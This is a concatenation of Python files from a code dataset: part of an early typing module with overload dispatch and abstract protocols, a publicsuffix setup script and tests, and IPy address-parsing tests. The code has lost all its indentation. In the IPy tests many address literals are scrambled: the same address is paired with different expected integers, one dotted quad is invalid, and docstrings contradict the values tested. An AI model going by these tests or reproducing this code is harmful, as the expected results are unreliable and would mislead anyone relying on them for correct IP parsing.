frame = sys._getframe(1)
locals = frame.f_locals
# See if there is a previous overload variant available. Also verify
# that the existing function really is overloaded: otherwise, replace
# the definition. The latter is actually important if we want to reload
# a library module such as genericpath with a custom one that uses
# overloading in the implementation.
if func.__name__ in locals and hasattr(locals[func.__name__], 'dispatch'):
orig_func = locals[func.__name__]
def wrapper(*args, **kwargs):
ret, ok = orig_func.dispatch(*args, **kwargs)
if ok:
return ret
return func(*args, **kwargs)
wrapper.isoverload = True
wrapper.dispatch = make_dispatcher(func, orig_func.dispatch)
wrapper.next = orig_func
wrapper.__name__ = func.__name__
if hasattr(func, '__isabstractmethod__'):
# Note that we can't reliably check that abstractmethod is
# used consistently across overload variants, so we let a
# static checker do it.
wrapper.__isabstractmethod__ = func.__isabstractmethod__
return wrapper
else:
# Return the initial overload variant.
func.isoverload = True
func.dispatch = make_dispatcher(func)
func.next = None
return func
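# Usage sketch (hypothetical example, not part of this module): successive definitions of the
# same name in one scope are chained, and calls dispatch on the runtime types of the arguments:
#
#     @overload
#     def double(x: int) -> int: return x * 2
#     @overload
#     def double(x: str) -> str: return x + x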
def is_erased_type(t):
return t is Any or isinstance(t, typevar)
def make_dispatcher(func, previous=None):
"""Create argument dispatcher for an overloaded function.
Also handle chaining of multiple overload variants.
"""
(args, varargs, varkw, defaults,
kwonlyargs, kwonlydefaults, annotations) = inspect.getfullargspec(func)
argtypes = []
for arg in args:
ann = annotations.get(arg)
if isinstance(ann, forwardref):
ann = ann.name
if is_erased_type(ann):
ann = None
elif isinstance(ann, str):
# The annotation is a string => evaluate it lazily when the
# overloaded function is first called.
frame = sys._getframe(2)
t = [None]
ann_str = ann
def check(x):
if not t[0]:
# Evaluate string in the context of the overload caller.
t[0] = eval(ann_str, frame.f_globals, frame.f_locals)
if is_erased_type(t[0]):
# Anything goes.
t[0] = object
if isinstance(t[0], type):
return isinstance(x, t[0])
else:
return t[0](x)
ann = check
argtypes.append(ann)
maxargs = len(argtypes)
minargs = maxargs
if defaults:
minargs = len(argtypes) - len(defaults)
def dispatch(*args, **kwargs):
if previous:
ret, ok = previous(*args, **kwargs)
if ok:
return ret, ok
nargs = len(args)
if nargs < minargs or nargs > maxargs:
# Invalid argument count.
return None, False
for i in range(nargs):
argtype = argtypes[i]
if argtype:
if isinstance(argtype, type):
if not isinstance(args[i], argtype):
break
else:
if not argtype(args[i]):
break
else:
return func(*args, **kwargs), True
return None, False
return dispatch
class Undefined:
"""Class that represents an undefined value with a specified type.
At runtime the name Undefined is bound to an instance of this
class. The intent is that any operation on an Undefined object
raises an exception, including use in a boolean context. Some
operations cannot be disallowed: Undefined can be used as an
operand of 'is', and it can be assigned to variables and stored in
containers.
'Undefined' makes it possible to declare the static type of a
variable even if there is no useful default value to initialize it
with:
from typing import Undefined
x = Undefined(int)
y = Undefined # type: int
The latter form can be used if efficiency is of utmost importance,
since it saves a call operation and potentially additional
operations needed to evaluate a type expression. Undefined(x)
just evaluates to Undefined, ignoring the argument value.
"""
def __repr__(self):
return '<typing.Undefined>'
def __setattr__(self, attr, value):
raise AttributeError("'Undefined' object has no attribute '%s'" % attr)
def __eq__(self, other):
raise TypeError("'Undefined' object cannot be compared")
def __call__(self, type):
return self
def __bool__(self):
raise TypeError("'Undefined' object is not valid as a boolean")
Undefined = Undefined()
# Abstract classes
T = typevar('T')
KT = typevar('KT')
VT = typevar('VT')
class SupportsInt(Protocol):
@abstractmethod
def __int__(self) -> int: pass
class SupportsFloat(Protocol):
@abstractmethod
def __float__(self) -> float: pass
class SupportsAbs(Protocol[T]):
@abstractmethod
def __abs__(self) -> T: pass
class SupportsRound(Protocol[T]):
@abstractmethod
def __round__(self, ndigits: int = 0) -> T: pass
class Reversible(Protocol[T]):
@abstractmethod
def __reversed__(self) -> 'Iterator[T]': pass
class Sized(Protocol):
@abstractmethod
def __len__(self) -> int: pass
class Container(Protocol[T]):
@abstractmethod
def __contains__(self, x) -> bool: pass
class Iterable(Protocol[T]):
@abstractmethod
def __iter__(self) -> 'Iterator[T]': pass
class Iterator(Iterable[T], Protocol[T]):
@abstractmethod
def __next__(self) -> T: pass
class Sequence(Sized, Iterable[T], Container[T], AbstractGeneric[T]):
@abstractmethod
@overload
def __getitem__(self, i: int) -> T: pass
@abstractmethod
@overload
def __getitem__(self, s: slice) -> 'Sequence[T]': pass
@abstractmethod
def __reversed__(self, s: slice) -> Iterator[T]: pass
@abstractmethod
def index(self, x) -> int: pass
@abstractmethod
def count(self, x) -> int: pass
for t in list, tuple, str, bytes, range:
Sequence.register(t)
class AbstractSet(Sized, Iterable[T], AbstractGeneric[T]):
@abstractmethod
def __contains__(self, x: object) -> bool: pass
@abstractmethod
def __and__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def __or__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def __sub__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def __xor__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def isdisjoint(self, s: 'AbstractSet[T]') -> bool: pass
for t in set, frozenset, type({}.keys()), type({}.items()):
AbstractSet.register(t)
class Mapping(Sized, Iterable[KT], AbstractGeneric[KT, VT]):
@abstractmethod
def __getitem__(self, k: KT) -> VT: pass
@abstractmethod
def __setitem__(self, k: KT, v: VT) -> None: pass
@abstractmethod
def __delitem__(self, v: KT) -> None: pass
@abstractmethod
def __contains__(self, o: object) -> bool: pass
@abstractmethod
def clear(self) -> None: pass
@abstractmethod
def copy(self) -> 'Mapping[KT, VT]': pass
@overload
@abstractmethod
def get(self, k: KT) -> VT: pass
@overload
@abstractmethod
def get(self, k: KT, default: VT) -> VT: pass
@overload
@abstractmethod
def pop(self, k: KT) -> VT: pass
@overload
@abstractmethod
def pop(self, k: KT, default: VT) -> VT: pass
@abstractmethod
def popitem(self) -> Tuple[KT, VT]: pass
@overload
@abstractmethod
def setdefault(self, k: KT) -> VT: pass
@overload
@abstractmethod
def setdefault(self, k: KT, default: VT) -> VT: pass
@overload
@abstractmethod
def update(self, m: 'Mapping[KT, VT]') -> None: pass
@overload
@abstractmethod
def update(self, m: Iterable[Tuple[KT, VT]]) -> None: pass
@abstractmethod
def keys(self) -> AbstractSet[KT]: pass
@abstractmethod
def values(self) -> AbstractSet[VT]: pass
@abstractmethod
def items(self) -> AbstractSet[Tuple[KT, VT]]: pass
# TODO Consider more types: os.environ, etc. However, these add dependencies.
Mapping.register(dict)
# Note that the BinaryIO and TextIO classes must be in sync with typing module
# stubs.
class IO(AbstractGeneric[AnyStr]):
@abstractproperty
def mode(self) -> str: pass
@abstractproperty
def name(self) -> str: pass
@abstractmethod
def close(self) -> None: pass
@abstractmethod
def closed(self) -> bool: pass
@abstractmethod
def fileno(self) -> int: pass
@abstractmethod
def flush(self) -> None: pass
@abstractmethod
def isatty(self) -> bool: pass
@abstractmethod
def read(self, n: int = -1) -> AnyStr: pass
@abstractmethod
def readable(self) -> bool: pass
@abstractmethod
def readline(self, limit: int = -1) -> AnyStr: pass
@abstractmethod
def readlines(self, hint: int = -1) -> List[AnyStr]: pass
@abstractmethod
def seek(self, offset: int, whence: int = 0) -> int: pass
@abstractmethod
def seekable(self) -> bool: pass
@abstractmethod
def tell(self) -> int: pass
@abstractmethod
def truncate(self, size: int = None) -> int: pass
@abstractmethod
def writable(self) -> bool: pass
@abstractmethod
def write(self, s: AnyStr) -> int: pass
@abstractmethod
def writelines(self, lines: List[AnyStr]) -> None: pass
@abstractmethod
def __enter__(self) -> 'IO[AnyStr]': pass
@abstractmethod
def __exit__(self, type, value, traceback) -> None: pass
class BinaryIO(IO[bytes]):
@overload
@abstractmethod
def write(self, s: bytes) -> int: pass
@overload
@abstractmethod
def write(self, s: bytearray) -> int: pass
@abstractmethod
def __enter__(self) -> 'BinaryIO': pass
class TextIO(IO[str]):
@abstractproperty
def buffer(self) -> BinaryIO: pass
@abstractproperty
def encoding(self) -> str: pass
@abstractproperty
def errors(self) -> str: pass
@abstractproperty
def line_buffering(self) -> bool: pass
@abstractproperty
def newlines(self) -> Any: pass
@abstractmethod
def __enter__(self) -> 'TextIO': pass
# TODO Register IO/TextIO/BinaryIO as the base class of file-like types.
del t
``` |
{
"source": "1py/publicsuffix",
"score": 2
} |
#### File: publicsuffix/Solc/setup.py
```python
from distutils.core import Command, setup
from distutils.command.install import INSTALL_SCHEMES
import unittest
UNITTESTS = [
"tests",
]
class TestCommand(Command):
user_options = [ ]
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
suite = unittest.TestSuite()
suite.addTests(
unittest.defaultTestLoader.loadTestsFromNames(
UNITTESTS ) )
result = unittest.TextTestRunner(verbosity=2).run(suite)
# Install data file into the same path as the module
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
setup(name='publicsuffix',
version='1.0.4',
description='Get a public suffix for a domain name using the Public Suffix List.',
license='MIT',
long_description=open("README").read(),
author='<NAME>',
author_email='<EMAIL>',
py_modules = ['publicsuffix'],
data_files = [('', ['publicsuffix.txt'])],
provides = [ 'publicsuffix' ],
cmdclass = { 'test': TestCommand },
classifiers = [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Internet :: Name Service (DNS)",
],
)
```
#### File: publicsuffix/tests/test_domstruct.py
```python
print('Executing %s' % __file__)
import unittest
import os, sys, time
from netutils import publicsuffix
class Test_get_domain_struct (unittest.TestCase):
"""
"""
def test_normal_fqdn_level6 (self):
domain = '6.5.4.3.google.co.uk'
ds = publicsuffix.DomainStruct(domain)
self.assertEqual (ds.nowww, '6.5.4.3.google.co.uk')
self.assertEqual (ds.eSLD, 'google')
self.assertEqual (ds.sub, '6.5.4.3')
self.assertEqual (ds.isFQDN, True)
self.assertListEqual(ds.eTkLD, [
'co.uk', # eTLD
'google.co.uk',
'3.google.co.uk',
'4.3.google.co.uk',
'5.4.3.google.co.uk',
'6.5.4.3.google.co.uk',
])
def test_normal_fqdn_level3 (self):
domain = 'www.google.co.uk'
ds = publicsuffix.DomainStruct(domain)
self.assertEqual (ds.nowww, 'google.co.uk')
self.assertEqual (ds.eSLD, 'google')
self.assertEqual (ds.sub, 'www')
self.assertEqual (ds.isFQDN, True)
self.assertListEqual(ds.eTkLD, [
'co.uk', # eTLD
'google.co.uk',
'www.google.co.uk',
])
def test_normal_fqdn_level2 (self):
domain = 'google.co.uk'
ds = publicsuffix.DomainStruct(domain)
self.assertEqual (ds.nowww, 'google.co.uk')
self.assertEqual (ds.eSLD, 'google')
self.assertEqual (ds.sub, '')
self.assertEqual (ds.isFQDN, True)
self.assertListEqual(ds.eTkLD, [
'co.uk', # eTLD
'google.co.uk',
])
def test_normal_nonfqdn (self):
domain = 'www.user.local'
ds = publicsuffix.DomainStruct (domain)
self.assertEqual (ds.nowww, 'user.local')
self.assertEqual (ds.eSLD, None)
self.assertEqual (ds.isFQDN, False)
self.assertListEqual(ds.eTkLD, [])
if __name__ == '__main__':
unittest.main()
```
#### File: publicsuffix/tests/test_publicsuffix.py
```python
print('Executing %s' % __file__)
import unittest
import os, sys, time
from netutils import publicsuffix
#import publicsuffix
class Test_get_public_suffix (unittest.TestCase):
""" Test the main publicsuffix.get_public_suffix() interface.
"""
def test_basic (self):
for d in [
'3ld.google.com',
'4ld.3ld.google.com',
'5ld.4ld.3ld.google.com',
]:
self.assertEqual('google.com',
publicsuffix.get_public_suffix(d))
# The following test cases are originally from
# http://mxr.mozilla.org/mozilla-central/source/netwerk/test/unit/data/test_psl.txt?raw=1
# and adapted by Tomaz Solc
def _checkPublicSuffix(self, a, b):
self.assertEqual(publicsuffix.get_public_suffix(a), b)
def test_mixed_case (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('COM', 'com');
checkPublicSuffix('example.COM', 'example.com');
checkPublicSuffix('WwW.example.COM', 'example.com');
def test_leading_dot (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('.com', 'com');
checkPublicSuffix('.example', 'example');
checkPublicSuffix('.example.com', 'example.com');
checkPublicSuffix('.example.example', 'example');
def test_unlisted_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('example', 'example');
checkPublicSuffix('example.example', 'example');
checkPublicSuffix('b.example.example', 'example');
checkPublicSuffix('a.b.example.example', 'example');
def test_listed_but_non_internet_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('local', 'local');
checkPublicSuffix('example.local', 'local');
checkPublicSuffix('b.example.local', 'local');
checkPublicSuffix('a.b.example.local', 'local');
def test_tld_with_only_1_rule (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('biz', 'biz');
checkPublicSuffix('domain.biz', 'domain.biz');
checkPublicSuffix('b.domain.biz', 'domain.biz');
checkPublicSuffix('a.b.domain.biz', 'domain.biz');
def test_tld_with_some_2_level_rules (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('com', 'com');
checkPublicSuffix('example.com', 'example.com');
checkPublicSuffix('b.example.com', 'example.com');
checkPublicSuffix('a.b.example.com', 'example.com');
checkPublicSuffix('uk.com', 'uk.com');
checkPublicSuffix('example.uk.com', 'example.uk.com');
checkPublicSuffix('b.example.uk.com', 'example.uk.com');
checkPublicSuffix('a.b.example.uk.com', 'example.uk.com');
checkPublicSuffix('test.ac', 'test.ac');
def test_tld_with_only_1_wildcard_rule (self):
""" For example,
// bd : http://en.wikipedia.org/wiki/.bd
*.bd
To be distinguished from
// eu : http://en.wikipedia.org/wiki/.eu
eu
It seems that the effective_tld_names list has a bug here.
If there is a wildcard rule '*.bd', there should also be a rule
'bd', or other exception rules.
"""
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('cy', 'cy');
checkPublicSuffix('c.cy', 'c.cy');
checkPublicSuffix('b.c.cy', 'b.c.cy');
checkPublicSuffix('a.b.c.cy', 'b.c.cy');
# These may seem counter-intuitive. Nobody believes that '2011.il' is
# a valid TLD.
checkPublicSuffix('www.2011.il', 'www.2011.il')
checkPublicSuffix('www.aabop-ziiy.kw', 'www.aabop-ziiy.kw')
def test_tld_with_wildcard_rule_and_exceptions (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('om', 'om');
checkPublicSuffix('test.om', 'test.om');
checkPublicSuffix('b.test.om', 'b.test.om');
checkPublicSuffix('a.b.test.om', 'b.test.om');
checkPublicSuffix('songfest.om', 'songfest.om');
checkPublicSuffix('www.songfest.om', 'songfest.om');
def test_more_complex_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('jp', 'jp');
checkPublicSuffix('test.jp', 'test.jp');
checkPublicSuffix('www.test.jp', 'test.jp');
checkPublicSuffix('ac.jp', 'ac.jp');
checkPublicSuffix('test.ac.jp', 'test.ac.jp');
checkPublicSuffix('www.test.ac.jp', 'test.ac.jp');
checkPublicSuffix('kobe.jp', 'kobe.jp');
checkPublicSuffix('c.kobe.jp', 'c.kobe.jp');
checkPublicSuffix('b.c.kobe.jp', 'b.c.kobe.jp');
checkPublicSuffix('a.b.c.kobe.jp', 'b.c.kobe.jp');
checkPublicSuffix('city.kobe.jp', 'city.kobe.jp'); # Exception rule.
checkPublicSuffix('www.city.kobe.jp', 'city.kobe.jp'); # Exception rule.
def test_us_k12_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('us', 'us');
checkPublicSuffix('test.us', 'test.us');
checkPublicSuffix('www.test.us', 'test.us');
checkPublicSuffix('ak.us', 'ak.us');
checkPublicSuffix('test.ak.us', 'test.ak.us');
checkPublicSuffix('www.test.ak.us', 'test.ak.us');
checkPublicSuffix('k12.ak.us', 'k12.ak.us');
checkPublicSuffix('test.k12.ak.us', 'test.k12.ak.us');
checkPublicSuffix('www.test.k12.ak.us', 'test.k12.ak.us');
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1py/python-ipy",
"score": 2
} |
#### File: python-ipy/test/test_IPy.py
```python
import sys
import threading
sys.path.append('.')
sys.path.append('..')
import IPy
import unittest
import random
testloops = 250
class parseAddress(unittest.TestCase):
okValues = [('fc00:db20:35b:7399::5', 338770000845734292534325025077361652240),
('FEDCBA9876543210FEDCBA9876543210', 338770000845734292534325025077361652240),
('0xFEDCBA9876543210FEDCBA9876543210', 338770000845734292534325025077361652240),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b', 21932261930451111902915077091070067066),
('fdf8:f53e:61e4::18', 21932261930451111902915077091070067066),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:200C:417A', 21932261930451111902915077091070067066),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:200C:417A', 21932261930451111902915077091070067066),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b', 338958331222012082418099330867817087043),
('fc00:e968:6179::de52:7100:43', 338958331222012082418099330867817087043),
('fc00:e968:6179::de52:7100', 338958331222012082418099330867817087043),
('0:0:0:0:0:0:0:1', 1),
('0:0:0::0:0:1', 1),
('::1', 1),
('0:0:0:0:0:0:0:0', 0),
('0:0:0::0:0:0', 0),
('::', 0),
('0:0:0:0:0:0:13.1.68.3', 218186755),
('::13.1.68.3', 218186755),
('0:0:0:0:0:FFFF:1172.16.17.32', 281472855454758),
('::FFFF:192.168.127.12', 281472855454758),
('fdf8:f53e:61e4::18', 21932261930451111902915077091070067066),
('fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b', 21932261930451111902915077091070067066),
('0.0.0.0', 0),
('0', 0),
('127.0.0.1', 2130706433),
('255.255.255.255', 4294967295),
('0.0.0.1', 1),
('1', 16777216),
('192.168.127.12', 3588059479),
('0000', 0),
('127001', 127001),
('1234576', 1234576),
('1', 16777216),
('232111387', 232111387),
('255', 4278190080),
('256', 256),
('0xffffffff', 4294967295),
('0x100000000', 4294967296),
('0xffffffffffffffffffffffffffffffff', 0xffffffffffffffffffffffffffffffff),
('0xdeadbeef', 0xdeadbeef),
('0xdeadbabe', 0xdeadbabe),
('0xdeadc0de', 0xdeadc0de),
('0xc0decafe', 0xc0decafe),
('0xc0debabe', 0xc0debabe),
('0xbabec0de', 0xbabec0de),
('0xcafebabe', 0xcafebabe),
('0x1', 1),
('0xabcdef', 11259375)]
# TODO: check for more invalid input
def testKnownValues(self):
"""parsing of known values should give known results"""
for x in self.okValues:
(question, answer) = x
(result, version) = IPy.parseAddress(question)
self.assertEqual(answer, result, "%r, %r, %r" % (question, answer, result))
def testVersionDistinction(self):
"""problems destinguishing IPv4 and IPv6"""
(result, version) = IPy.parseAddress('0xffffffff')
self.assertEqual(version, 4)
(result, version) = IPy.parseAddress('0x100000000')
self.assertEqual(version, 6)
def testEmpty(self):
"""'' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '')
def testTooBig(self):
"""'' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '0x100000000000000000000000000000000')
def testLongIPv4(self):
"""'1.2.3.4.5' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1.2.3.4.5')
def testNonByteIPv4(self):
"""'1.2.3.256' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1.2.3.256')
def testNegativeByteIPv4(self):
"""'-1.2.3.4' and '1.2.3.-4' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '-1.2.3.4')
self.assertRaises(ValueError, IPy.parseAddress, '1.2.3.-4')
def testTripleColonIPv6(self):
"""'2001:::1' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001:::1')
def testRepeatDoubleColonIPv6(self):
"""'2001::ABCD::1' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001::ABCD::1')
def testDoubleColonWithEightHextetsIPv6(self):
"""'fdf8:f53e:61e4::18:3333:4444:5555:6666:7777:8888' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, 'fdf8:f53e:61e4::18:3333:4444:5555:6666:7777:8888')
def testBeginningColonWithEightHextetsIPv6(self):
"""':fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, ':fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b')
def testEndingColonWithEightHextetsIPv6(self):
"""'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1111:2222:3333:4444:5555:6666:7777:8888:')
def testNegativeHexletIPv6(self):
"""'2001:-ABfc00:db20:35b:7399::5' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001:-ABfc00:db20:35b:7399::5')
def testTooBigHexletIPv6(self):
"""'2001:10000::1' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001:10000::1')
def testShortAddressIPv6(self):
"""'1111:2222:3333:4444:5555:6666:7777' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1111:2222:3333:4444:5555:6666:7777')
def testLongAddressIPv6(self):
"""'1111:2222:3333:4444:5555:6666:7777:8888:9999' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1111:2222:3333:4444:5555:6666:7777:8888:9999')
def testBogusValues(self):
"""Text values should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, 'xx')
self.assertRaises(ValueError, IPy.parseAddress, 'foobar')
class _intToIP(unittest.TestCase):
v4values = [(0x7f000001, '127.0.0.1'),
(0x0, '0.0.0.0'),
(0x1, '0.0.0.1'),
(0xf, '0.0.0.15'),
(0xff, '0.0.0.255'),
(0xFFFFFFFF, '255.255.255.255')]
v6values = [(0x7f000001, 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'),
(0x0, '0000:0000:0000:0000:0000:0000:0000:0000'),
(0x1, '0000:0000:0000:0000:0000:0000:0000:0001'),
(0xf, 'fc00:e968:6179::de52:7100'),
(0xff, 'fdf8:f53e:61e4::18'),
(0xFFFFFFFF, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(0x100000000, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF, 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff')]
def testKnownValuesv4(self):
"""printing of known IPv4 values should give known results"""
for x in self.v4values:
(question, answer) = x
result = IPy.intToIp(question, 4).lower()
self.assertEqual(answer, result, "%r, %r, %r" % (question, answer, result))
def testKnownValuesv6(self):
"""printing of known IPv6 values should give known results"""
for x in self.v6values:
(question, answer) = x
result = IPy.intToIp(question, 6).lower()
self.assertEqual(answer, result, "%r, %r, %r" % (question, answer, result))
def testNegativeIPv4(self):
"""negative IPv4 Values should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, -1, 4)
def testNegativeIPv6(self):
"""negative IPv6 Values should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, -1, 6)
def testLargeIPv4(self):
"""IPv4: Values > 0xffffffff should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, 0x100000000, 4)
def testLargeIPv6(self):
"""IPv6: Values > 0xffffffffffffffffffffffffffffffff should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, 0x100000000000000000000000000000000, 6)
def testIllegalVersion(self):
"""IPVersion other than 4 and 6 should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, 1, 0)
self.assertRaises(ValueError, IPy.intToIp, 1, 1)
self.assertRaises(ValueError, IPy.intToIp, 1, 2)
self.assertRaises(ValueError, IPy.intToIp, 1, 3)
self.assertRaises(ValueError, IPy.intToIp, 1, 5)
self.assertRaises(ValueError, IPy.intToIp, 1, 7)
self.assertRaises(ValueError, IPy.intToIp, 1, 8)
class ParseAndBack(unittest.TestCase):
def testRandomValuesv4(self):
for i in range(testloops):
question = random.randrange(0x7fffffff) + random.randrange(0x7fffffff)
self.assertEqual(IPy.parseAddress(IPy.intToIp(question, 4)), (question, 4), hex(question))
def testRandomValuesv6(self):
for i in range(testloops):
question = ((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) +
((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) << 32) +
((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) << 64) +
((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) << 96))
self.assertEqual(IPy.parseAddress(IPy.intToIp(question, 6)), (question, 6), hex(question))
class _countXBits(unittest.TestCase):
def testCount1Bits(self):
self.assertEqual(IPy._count1Bits(0), 0)
self.assertEqual(IPy._count1Bits(0xf), 4)
self.assertEqual(IPy._count1Bits(0x10), 5)
self.assertEqual(IPy._count1Bits(0xff), 8)
self.assertEqual(IPy._count1Bits(0xffff), 16)
self.assertEqual(IPy._count1Bits(0xffffffff), 32)
self.assertEqual(IPy._count1Bits(0xffffffffffffffffffffffffffffffff), 128)
def testCount0Bits(self):
self.assertEqual(IPy._count0Bits(0), 0)
self.assertEqual(IPy._count0Bits(0xf0), 4)
self.assertEqual(IPy._count0Bits(0xf00), 8)
self.assertEqual(IPy._count0Bits(0xf000), 12)
self.assertEqual(IPy._count0Bits(0xf0000), 16)
self.assertEqual(IPy._count0Bits(0xf00000), 20)
self.assertEqual(IPy._count0Bits(0xf000000), 24)
self.assertEqual(IPy._count0Bits(0xf0000000), 28)
self.assertEqual(IPy._count0Bits(0xff000000), 24)
self.assertEqual(IPy._count0Bits(0xfff00000), 20)
self.assertEqual(IPy._count0Bits(0x80000000), 31)
self.assertEqual(IPy._count0Bits(0xf0000000000000000000000000000000), 124)
self.assertEqual(IPy._count0Bits(0x80000000000000000000000000000000), 127)
class _intToBin(unittest.TestCase):
knownValues = [(0, '0'), (1, '1'), (2, '10'), (3, '11'), (4, '100'), (5, '101'),
(6, '110'), (7, '111'), (8, '1000'), (9, '1001'),
(0xf, '1111'), (0xff, '11111111'),
(0xFFFFFFFF, '11111111111111111111111111111111'),
(0x100000000, '100000000000000000000000000000000'),
(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF, '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'),
(0x100000000000000000000000000000000, '100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')]
def testKnownValues(self):
"""conversion of known values values should give known results"""
for x in self.knownValues:
(question, answer) = x
result = IPy._intToBin(question)
self.assertEqual(answer, result, str(question))
def testNegativeIPv4(self):
"""negative Values should raise an exception"""
self.assertRaises(ValueError, IPy._intToBin, -1)
class netmaskPrefixlenConv(unittest.TestCase):
known4Values = [(0xFFFFFFFF, 32), (0xFFFFFFFE, 31), (0xFFFFFFFC, 30), (0xFFFFFFF8, 29),
(0xFFFFFFF0, 28), (0xFFFFFFE0, 27), (0xFFFFFFC0, 26), (0xFFFFFF80, 25),
(0xFFFFFF00, 24), (0xFFFFFE00, 23), (0xFFFFFC00, 22), (0xFFFFF800, 21),
(0xFFFFF000, 20), (0xFFFFE000, 19), (0xFFFFC000, 18), (0xFFFF8000, 17),
(0xFFFF0000, 16), (0xFFFE0000, 15), (0xFFFC0000, 14), (0xFFF80000, 13),
(0xFFF00000, 12), (0xFFE00000, 11), (0xFFC00000, 10), (0xFF800000, 9),
(0xFF000000, 8), (0xFE000000, 7), (0xFC000000, 6), (0xF8000000, 5),
(0xF0000000, 4), (0xE0000000, 3), (0xC0000000, 2), (0x80000000, 1)]
known6Values = [(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF, 128),
(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE, 127),
(0xFFFFFFFFFFFFFFFFFFFFFFFF80000000, 97),
(0xFFFFFFFFFFFFFFFFFFFFFFFF00000000, 96),
(0xFFFFFFFFFFFFFFFFFFFFFFFE00000000, 95),
(0xFFFFFFFFFFFFFFFF8000000000000000, 65),
(0xFFFFFFFFFFFFFFFF0000000000000000, 64),
(0xFFFFFFFFFFFFFFFE0000000000000000, 63),
(0xFFFFFFFF800000000000000000000000, 33),
(0xFFFFFFFF000000000000000000000000, 32),
(0xFFFFFFFE000000000000000000000000, 31),
(0xC0000000000000000000000000000000, 2),
(0x80000000000000000000000000000000, 1)]
def testKnownValuesv4n2p(self):
"""conversion of known values values should give known results"""
for x in self.known4Values:
(question, answer) = x
result = IPy._netmaskToPrefixlen(question)
self.assertEqual(answer, result, hex(question))
def testKnownValuesv6n2p(self):
"""conversion of known values values should give known results"""
for x in self.known6Values:
(question, answer) = x
result = IPy._netmaskToPrefixlen(question)
self.assertEqual(answer, result, hex(question))
def testKnownValuesv4p2n(self):
"""conversion of known values values should give known results"""
for x in self.known4Values:
(answer, question) = x
result = IPy._prefixlenToNetmask(question, 4)
self.assertEqual(answer, result, hex(question))
def testKnownValuesv6p2n(self):
"""conversion of known values values should give known results"""
for x in self.known6Values:
(answer, question) = x
result = IPy._prefixlenToNetmask(question, 6)
self.assertEqual(answer, result, "%d: %s != %s" % (question, hex(answer), result))
def testInvalidv4n2p(self):
"""Netmasks should be all ones in the first part and all zeros in the second part"""
self.assertRaises(ValueError, IPy._netmaskToPrefixlen, 0xff00ff00)
def testInvalidv6n2p(self):
"""Netmasks should be all ones in the first part and all zeros in the second part"""
self.assertRaises(ValueError, IPy._netmaskToPrefixlen, 0xff00ff00ff00ff00ff00ff00ff00ff00)
class checkChecks(unittest.TestCase):
def testCheckNetmaskOk(self):
"""Legal Netmasks should be allowed."""
self.assertFalse(IPy._checkNetmask(0xffffffff, 32))
self.assertFalse(IPy._checkNetmask(0xffffff00, 32))
self.assertFalse(IPy._checkNetmask(0xffff0000, 32))
self.assertFalse(IPy._checkNetmask(0xff000000, 32))
self.assertFalse(IPy._checkNetmask(0, 32))
